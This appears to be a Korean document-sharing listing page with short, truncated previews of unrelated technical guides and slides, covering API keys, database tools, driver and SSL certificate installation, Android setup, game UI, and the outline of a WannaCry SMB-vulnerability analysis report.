API STORE 키발급및 API 사용가이드 Document Information 문서명 : API STORE 언어별 Client 사용가이드작성자 : 작성일 : 업무영역 : 버전 : 1 st Draft. 서브시스템 : 문서번호 : 단계 : Docum

API STORE 키발급및 API 사용가이드 Document Information 문서명 : API STORE 언어별 Client 사용가이드작성자 : 작성일 : 업무영역 : 버전 : 1 st Draft. 서브시스템 : 문서번호 : 단계 : Docum API STORE 키발급및 API 사용가이드 Document Information 문서명 : API STORE 언어별 Client 사용가이드작성자 : 작성일 : 2012.11.23 업무영역 : 버전 : 1 st Draft. 서브시스템 : 문서번호 : 단계 : Document Distribution Copy Number Name(Role, Title) Date

More information

슬라이드 1

슬라이드 1 Tadpole for DB 1. 도구개요 2. 설치및실행 4. 활용예제 1. 도구개요 도구명 소개 Tadpole for DB Tools (sites.google.com/site/tadpolefordb/) 웹기반의데이터베이스를관리하는도구 Database 스키마및데이터관리 라이선스 LGPL (Lesser General Public License) 특징 주요기능

More information

MF Driver Installation Guide

MF Driver Installation Guide Korean MF 드라이버 설치설명서 사용자 소프트웨어 CD-ROM... 드라이버 및 소프트웨어 정보...1 지원되는 운영 체제...1 MF 드라이버 및 MF Toolbox 설치... [쉬운 설치]를 사용한 설치...2 [사용자 정의 설치]를 사용한 설치...10 USB 케이블 연결(USB를 이용해 연결하는 경우만)...20 설치 결과 확인...21 온라인

More information

4S 1차년도 평가 발표자료

4S 1차년도 평가 발표자료 모바일 S/W 프로그래밍 안드로이드개발환경설치 2012.09.05. 오병우 모바일공학과 JDK (Java Development Kit) SE (Standard Edition) 설치순서 Eclipse ADT (Android Development Tool) Plug-in Android SDK (Software Development Kit) SDK Components

More information

1) 인증서만들기 ssl]# cat >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키

1) 인증서만들기 ssl]# cat   >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키 Lighttpd ( 단일도메인 ) SSL 인증서신규설치가이드. [ 고객센터 ] 한국기업보안. 유서트기술팀 1) 인증서만들기 [root@localhost ssl]# cat www.ucert.co.kr.key www.ucert.co.kr.crt >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat

More information

Microsoft PowerPoint - 3장-MS SQL Server.ppt [호환 모드]

Microsoft PowerPoint - 3장-MS SQL Server.ppt [호환 모드] MS SQL Server 마이크로소프트사가윈도우운영체제를기반으로개발한관계 DBMS 모바일장치에서엔터프라이즈데이터시스템에이르는다양한플랫폼에서운영되는통합데이터관리및분석솔루션 2 MS SQL Server 개요 3.1 MS SQL Server 개요 클라이언트-서버모델을기반으로하는관계 DBMS로서윈도우계열의운영체제에서만동작함 오라클관계 DBMS보다가격이매우저렴한편이고,

More information

슬라이드 1

슬라이드 1 핚국산업기술대학교 제 14 강 GUI (III) 이대현교수 학습안내 학습목표 CEGUI 라이브러리를이용하여, 게임메뉴 UI 를구현해본다. 학습내용 CEGUI 레이아웃의로딩및렌더링. OIS 와 CEGUI 의연결. CEGUI 위젯과이벤트의연동. UI 구현 : 하드코딩방식 C++ 코드를이용하여, 코드내에서직접위젯들을생성및설정 CEGUI::PushButton* resumebutton

More information

ISP and CodeVisionAVR C Compiler.hwp

ISP and CodeVisionAVR C Compiler.hwp USBISP V3.0 & P-AVRISP V1.0 with CodeVisionAVR C Compiler http://www.avrmall.com/ November 12, 2007 Copyright (c) 2003-2008 All Rights Reserved. USBISP V3.0 & P-AVRISP V1.0 with CodeVisionAVR C Compiler

More information

목차 1. 개요 배경 파일정보 상세분석 SMB 취약점공격흐름 특징적인행위 대응

목차 1. 개요 배경 파일정보 상세분석 SMB 취약점공격흐름 특징적인행위 대응 MALWARE ANALYSIS REPORT WannaCry 랜섬웨어분석 #2 SMB 취약점분석 목차 1. 개요... 3 1.1 배경... 3 1.2 파일정보... 3 2. 상세분석... 4 2.1 SMB 취약점공격흐름... 4 2.2 특징적인행위... 11 3. 대응... 12-2 - 1. 개요 1.1 배경 2017년 5월 17일배포한 WannaCry 분석보고서에도언급되었듯이,

More information

슬라이드 1

슬라이드 1 ment Perspective (주)아임굿은 빅데이터 기술력, 반응형웹 제작, 온라인마케팅 노하우를 겸비한 IT 솔루션개발 및 마케팅 전문 기업입니다. 웹 정보를 수집하는 크롟링 시스템과 대량의 데이터를 처리하는 빅데이터 기술을 통해 쉽게 지나칠 수 있는 정보를 좀 더 가치있고 흥미로운 결과물로 변화하여 고객에게 제공하고 있습니다. 또한 최근 관심이 높아지고

More information

쉽게 풀어쓴 C 프로그래밍

쉽게 풀어쓴 C 프로그래밍 CHAPTER 13. HTML5 위치정보와드래그앤드롭 SVG SVG(Scalable Vector Graphics) 는 XML- 기반의벡터이미지포맷 웹에서벡터 - 기반의그래픽을정의하는데사용 1999 년부터 W3C 에의하여표준 SVG 의장점 SVG 그래픽은확대되거나크기가변경되어도품질이손상되지않는다. SVG 파일에서모든요소와속성은애니메이션이가능하다. SVG 이미지는어떤텍스트에디터로도생성하고편집할수있다.

More information

리눅스설치가이드 3. 3Rabbitz Book 을리눅스에서설치하기위한절차는다음과같습니다. 설치에대한예시는우분투서버 기준으로진행됩니다. 1. Java Development Kit (JDK) 또는 Java Runtime Environment (JRE) 를설치합니다. 2.

리눅스설치가이드 3. 3Rabbitz Book 을리눅스에서설치하기위한절차는다음과같습니다. 설치에대한예시는우분투서버 기준으로진행됩니다. 1. Java Development Kit (JDK) 또는 Java Runtime Environment (JRE) 를설치합니다. 2. 3. 3Rabbitz Book 을리눅스에서설치하기위한절차는다음과같습니다. 설치에대한예시는우분투서버 기준으로진행됩니다. 1. Java Development Kit (JDK) 또는 Java Runtime Environment (JRE) 를설치합니다. 2. 3Rabbitz Book 애플리케이션파일다운로드하여압축파일을풀고복사합니다. 3. 3Rabbitz Book 실행합니다.

More information

슬라이드 1

슬라이드 1 Subclipse 1. 도구개요 2. 설치및실행 3. 주요기능 4. 활용예제 1. 도구개요 도구명 Subclipse (http://subclipse.tigris.org/) 라이선스 Eclipse Public License v1.0 소개 Subversion( 이하 svn) 용 Eclipse 플러그인 SVN 을만든 Tigris.org 에서만든클라이언트툴 Java

More information

슬라이드 1

슬라이드 1 전자정부개발프레임워크 1 일차실습 LAB 개발환경 - 1 - 실습목차 LAB 1-1 프로젝트생성실습 LAB 1-2 Code Generation 실습 LAB 1-3 DBIO 실습 ( 별첨 ) LAB 1-4 공통컴포넌트생성및조립도구실습 LAB 1-5 템플릿프로젝트생성실습 - 2 - LAB 1-1 프로젝트생성실습 (1/2) Step 1-1-01. 구현도구에서 egovframe>start>new

More information

WINDOW FUNCTION 의이해와활용방법 엑셈컨설팅본부 / DB 컨설팅팀정동기 개요 Window Function 이란행과행간의관계를쉽게정의할수있도록만든함수이다. 윈도우함수를활용하면복잡한 SQL 들을하나의 SQL 문장으로변경할수있으며반복적으로 ACCESS 하는비효율역

WINDOW FUNCTION 의이해와활용방법 엑셈컨설팅본부 / DB 컨설팅팀정동기 개요 Window Function 이란행과행간의관계를쉽게정의할수있도록만든함수이다. 윈도우함수를활용하면복잡한 SQL 들을하나의 SQL 문장으로변경할수있으며반복적으로 ACCESS 하는비효율역 WINDOW FUNCTION 의이해와활용방법 엑셈컨설팅본부 / DB 컨설팅팀정동기 개요 Window Function 이란행과행간의관계를쉽게정의할수있도록만든함수이다. 윈도우함수를활용하면복잡한 SQL 들을하나의 SQL 문장으로변경할수있으며반복적으로 ACCESS 하는비효율역시쉽게해결할수있다. 이번화이트페이퍼에서는 Window Function 중순위 RANK, ROW_NUMBER,

More information

ICAS CADWorx SPLM License 평가판설치가이드

ICAS CADWorx SPLM License 평가판설치가이드 ICAS CADWorx SPLM License 평가판설치가이드 CADWorx SPLM License 평가판설치가이드 설치권장사항 Operating System Compatibility ( 반드시 AutoCAD 가설치되어있어야합니다.) 추천시스템 3.0 GHz Intel Pentium IV or greater Windows XP Professional or later

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 B Type 가이드 가지고있는도메인사용 + 인증서구매대행절차 1. 신청하기. 네임서버변경 / 확인 - 네임서버변경 - 네임서버변경확인 3. 인증심사메일에회신하기 - 메일주소확인 - 메일주소변경 - 인증심사메일서명 4. Ver. 015.10.14 가지고있는도메인사용 + 인증서구매대행절차 도메인은가지고있으나인증서가없는경우소유한도메인주소로 를오픈하고인증서는 Qoo10

More information

1) 인증서만들기 ssl]# cat >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키

1) 인증서만들기 ssl]# cat   >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키 Lighttpd ( 멀티도메인 ) SSL 인증서신규설치가이드. [ 고객센터 ] 한국기업보안. 유서트기술팀 1) 인증서만들기 [root@localhost ssl]# cat www.ucert.co.kr.key www.ucert.co.kr.crt >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat

More information

EndNote X2 초급 분당차병원도서실사서최근영 ( )

EndNote X2 초급 분당차병원도서실사서최근영 ( ) EndNote X2 초급 2008. 9. 25. 사서최근영 (031-780-5040) EndNote Thomson ISI Research Soft의 bibliographic management Software 2008년 9월현재 X2 Version 사용 참고문헌 (Reference), Image, Fulltext File 등 DB 구축 참고문헌 (Reference),

More information

Data Sync Manager(DSM) Example Guide Data Sync Manager (DSM) Example Guide DSM Copyright 2003 Ari System, Inc. All Rights reserved. Data Sync Manager

Data Sync Manager(DSM) Example Guide Data Sync Manager (DSM) Example Guide DSM Copyright 2003 Ari System, Inc. All Rights reserved. Data Sync Manager Data Sync Manager (DSM) Example Guide DSM Copyright 2003 Ari System, Inc. All Rights reserved. Data Sync Manager are trademarks or registered trademarks of Ari System, Inc. 1 Table of Contents Chapter1

More information